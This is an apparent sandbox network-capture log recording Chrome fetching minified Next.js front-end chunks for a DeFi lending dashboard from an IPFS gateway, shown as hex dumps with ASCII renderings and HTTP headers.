                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 66 6c 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 33 38 33 44 35 31 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 22 2e 4d 75 69 54 79 70
                                                                                                                                                                                                                                                  Data Ascii: flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"100%",display:"flex",justifyContent:"center",".MuiTyp
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 73 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 73 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                  Data Ascii: ;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?s(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):s(Object(r)).forEach((function(
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 3a 31 2c 78 73 6d 3a 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 6d 62 3a 74 3f 30 3a 34 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 72 26 26 28 30 2c 78 2e 6a 73 78 29 28 64 2e 74 46 2c 7b 7d 29 2c 62 26 26 68 26 26 28 30 2c 78 2e 6a 73 78 29 28 70 2e 72 55 2c 7b 68 72 65 66 3a 70 2e 5a 36 2e 6d 69 67 72 61 74 69 6f 6e 54 6f 6f 6c 2c 73 78 3a 7b 6d 74 3a 7b 78 73 3a 32 2c 78 73 6d 3a 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 67 72 61 64 69 65 6e 74 22 2c 73 69
                                                                                                                                                                                                                                                  Data Ascii: :1,xsm:0}},children:t})}),(0,x.jsxs)(a.Z,{sx:{display:"flex",alignItems:"flex-start",flexWrap:"wrap",mb:t?0:4},children:[r&&(0,x.jsx)(d.tF,{}),b&&h&&(0,x.jsx)(p.rU,{href:p.Z6.migrationTool,sx:{mt:{xs:2,xsm:0}},children:(0,x.jsx)(c.Z,{variant:"gradient",si
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC284INData Raw: 2c 7b 70 62 3a 30 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 70 78 3a 7b 78 73 3a 34 2c 78 73 6d 3a 36 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 72 26 26 28 30 2c 73 2e 6a 73 78 29 28 61 2e 56 2c 7b 70 61 67 65 54 69 74 6c 65 3a 74 2c 77 69 74 68 4d 61 72 6b 65 74 53 77 69 74 63 68 65 72 3a 6e 2c 77 69 74 68 4d 69 67 72 61 74 65 42 75 74 74 6f 6e 3a 63 2c 62 72 69 64 67 65 3a 75 7d 29 2c 72 26 26 72 2c 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 67 61 70 3a 7b 78 73 3a 33 2c 78 73 6d 3a 38 7d 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 77 69 64 74 68 3a 22 31 30 30 25
                                                                                                                                                                                                                                                  Data Ascii: ,{pb:0}),children:(0,s.jsxs)(o.Z,{sx:{px:{xs:4,xsm:6}},children:[!r&&(0,s.jsx)(a.V,{pageTitle:t,withMarketSwitcher:n,withMigrateButton:c,bridge:u}),r&&r,(0,s.jsx)(o.Z,{sx:{display:"flex",alignItems:"flex-start",gap:{xs:3,xsm:8},flexWrap:"wrap",width:"100%


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  93192.168.2.549813209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/8019-7233b42ab9ef6fe6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13675
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihdd2frqehs4kha5it6epwlp33lfvnaagixfkywfdqnimiam3cxe4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8019-7233b42ab9ef6fe6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihdd2frqehs4kha5it6epwlp33lfvnaagixfkywfdqnimiam3cxe4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 690711
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 37 65 38 64 65 31 61 30 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e437e8de1a07-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 30 31 39 5d 2c 7b 34 35 38 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 33 30 31 32 30 29 2c 6e 3d 72 28 38 35 38 39 33 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 73 52 6f 77 2c 72 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 69 3d 65 2e 6d 69 6e 57 69 64 74 68 2c 73 3d 65 2e 6d 61 78 57 69 64 74 68 2c 61 3d 65 2e 61 6c 69 67 6e 2c 6c 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 22 63 65 6e 74 65 72 22
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8019],{45884:function(e,t,r){r.d(t,{h:function(){return i}});var o=r(30120),n=r(85893),i=function(e){var t=e.isRow,r=e.children,i=e.minWidth,s=e.maxWidth,a=e.align,l=void 0===a?"center"
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 65 2e 6d 69 6e 48 65 69 67 68 74 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 37 31 3a 72 2c 6c 3d 65 2e 70 78 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 6c 3f 34 3a 6c 2c 64 3d 65 2e 62 75 74 74 6f 6e 2c 70 3d 28 30 2c 6e 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 69 2e 5a 2c 63 28 63 28 7b 7d 2c 70 29 2c 7b 7d 2c 7b 73 78 3a 63 28 63 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6d 69 6e 48 65 69 67 68 74 3a 6f 2c 70 78 3a 75 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 22 3a 7b 62 6f
                                                                                                                                                                                                                                                  Data Ascii: r(r,t))}))}return e}var u=function(e){var t=e.children,r=e.minHeight,o=void 0===r?71:r,l=e.px,u=void 0===l?4:l,d=e.button,p=(0,n.Z)(e,a);return(0,s.jsx)(i.Z,c(c({},p),{},{sx:c(c({display:"flex",alignItems:"center",minHeight:o,px:u,"&:not(:last-child)":{bo
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 74 65 6d 28 72 29 29 2c 4f 3d 6a 5b 30 5d 2c 49 3d 6a 5b 31 5d 2c 44 3d 28 30 2c 63 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 2c 53 3d 4f 26 26 21 76 3b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 66 28 7b 6d 74 3a 6d 3f 34 3a 30 2c 62 6f 72 64 65 72 3a 31 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 64 69 76 69 64 65 72 22 7d 2c 77 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 70 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 66 28 7b 70 78 3a 7b 78 73 3a 34 2c 78 73 6d 3a 36 7d 2c 70 79 3a 7b 78 73 3a 33 2e 35 2c 78 73 6d 3a 34 7d 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66
                                                                                                                                                                                                                                                  Data Ascii: tem(r)),O=j[0],I=j[1],D=(0,c.Y)((function(e){return e.trackEvent})),S=O&&!v;return(0,p.jsxs)(i.Z,{sx:f({mt:m?4:0,border:1,borderColor:"divider"},w),children:[(0,p.jsxs)(s.Z,{sx:f({px:{xs:4,xsm:6},py:{xs:3.5,xsm:4},display:"flex",alignItems:"center",justif
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43 6f 6c 6c 61 70 73 65 22 3a 44 28 75 2e 68 31 2e 54 49 4c 45 5f 56 49 53 42 49 4c 49 54 59 2c 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 48 69 64 64 65 6e 22 2c 74 79 70 65 3a 22 41 76 61 69 6c 61 62 6c 65 20 42 6f 72 72 6f 77 20 41 73 73 65 74 73 22 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 6f 72 72 6f 77 65 64 41 73 73 65 74 73 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43 6f 6c 6c 61 70 73 65 22 3a 44 28 75 2e 68 31 2e 54 49 4c 45 5f 56 49 53 42 49 4c 49 54 59 2c 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 48 69 64 64 65 6e 22 2c 74 79 70 65 3a 22 42 6f 72 72 6f 77 65 64 20 41 73 73 65 74 73 22 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 75 70 70 6c 79 41 73 73 65 74 73 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43
                                                                                                                                                                                                                                                  Data Ascii: DashboardTableCollapse":D(u.h1.TILE_VISBILITY,{visibility:"Hidden",type:"Available Borrow Assets"});break;case"borrowedAssetsDashboardTableCollapse":D(u.h1.TILE_VISBILITY,{visibility:"Hidden",type:"Borrowed Assets"});break;case"supplyAssetsDashboardTableC
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 63 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6f 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62
                                                                                                                                                                                                                                                  Data Ascii: numerable}))),r.push.apply(r,o)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Ob
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 77 3d 67 3f 79 3a 6d 2c 6a 3d 21 31 21 3d 3d 69 26 26 28 69 7c 7c 6d 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 66 26 26 21 6a 26 26 28 77 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 77 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 76 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 76 29 29 2c 28 30 2c 61 2e 6a 73 78 73 29 28 73 2e 5a 2c 75 28 75 28 7b 7d 2c 78 29 2c 7b 7d 2c 7b 73 78 3a 75 28 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 78 2e 73 78 29 2c 6e 6f 57 72 61 70 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 5b 67 26 26 28 30 2c 61 2e 6a 73
                                                                                                                                                                                                                                                  Data Ascii: w=g?y:m,j=!1!==i&&(i||m>99999);return f&&!j&&(w=Math.trunc(Number(w)*Math.pow(10,v))/Math.pow(10,v)),(0,a.jsxs)(s.Z,u(u({},x),{},{sx:u({display:"inline-flex",flexDirection:"row",alignItems:"center",position:"relative"},x.sx),noWrap:!0,children:[g&&(0,a.js
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 78 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28
                                                                                                                                                                                                                                                  Data Ascii: bols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function m(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?x(Object(r),!0).forEach((function(t){(
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6e 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 78 29 29 29 29 29 7d 7d 29 2c 5b 61 2c 6f 5d 29 2c 28 30 2c 64 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 73 74 79 6c 65 3a 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 68 69 64 64 65 6e 22 2c 68 65 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 6f 62 6a 65 63 74 22 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: n.current)||void 0===h?void 0:h.contentDocument);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComponent(x)))))}}),[a,o]),(0,d.jsxs)("div",{style:{visibility:"hidden",height:0,width:0,overflow:"hidden"},children:[(0,d.jsx)("object",{
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2e 33 31 37 2d 34 36 2e 33 37 38 41 31 32 37 2e 33 33 20 31 32 37 2e 33 33 20 30 20 30 20 31 20 31 30 32 2e 32 20 32 2e 36 61 31 32 39 2e 32 34 34 20 31 32 39 2e 32 34 34 20 30 20 30 20 31 20 35 31 2e 35 39 33 20 30 20 31 32 37 2e 33 30 38 20 31 32 37 2e 33 30 38 20 30 20 30 20 31 20 34 35 2e 37 37 20 31 39 2e 32 36 20 31 32 38 2e 33 36 37 20 31 32 38 2e 33 36 37 20 30 20 30 20 31 20 34 36 2e 33 37 35 20 35 36 2e 33 31 36 41 31 32 37 2e 33 34 33 20 31 32 37 2e 33 34 33 20 30 20 30 20 31 20 32 35 33 2e 34 20 31 30 32 2e 32 61 31 32 39 2e 32 34 38 20 31 32 39 2e 32 34 38 20 30 20 30 20 31 20 30 20 35 31 2e 35 39 33 20 31 32 37 2e 33 20 31 32 37 2e 33 20 30 20 30 20 31 2d 31 39 2e 32 36 20 34 35 2e 37 37 20 31 32 38 2e 33 38 32 20 31 32 38 2e 33 38 32 20 30
                                                                                                                                                                                                                                                  Data Ascii: .317-46.378A127.33 127.33 0 0 1 102.2 2.6a129.244 129.244 0 0 1 51.593 0 127.308 127.308 0 0 1 45.77 19.26 128.367 128.367 0 0 1 46.375 56.316A127.343 127.343 0 0 1 253.4 102.2a129.248 129.248 0 0 1 0 51.593 127.3 127.3 0 0 1-19.26 45.77 128.382 128.382 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  94192.168.2.549814209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/5315-ede49da3c729b6f5.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11336
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreie57xyrfi2gfqidueje4dvu2mlhd2lwss6jzithrh627mc23bxicy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5315-ede49da3c729b6f5.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreie57xyrfi2gfqidueje4dvu2mlhd2lwss6jzithrh627mc23bxicy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028481
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 37 65 66 65 31 64 65 39 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e437efe1de93-EWR
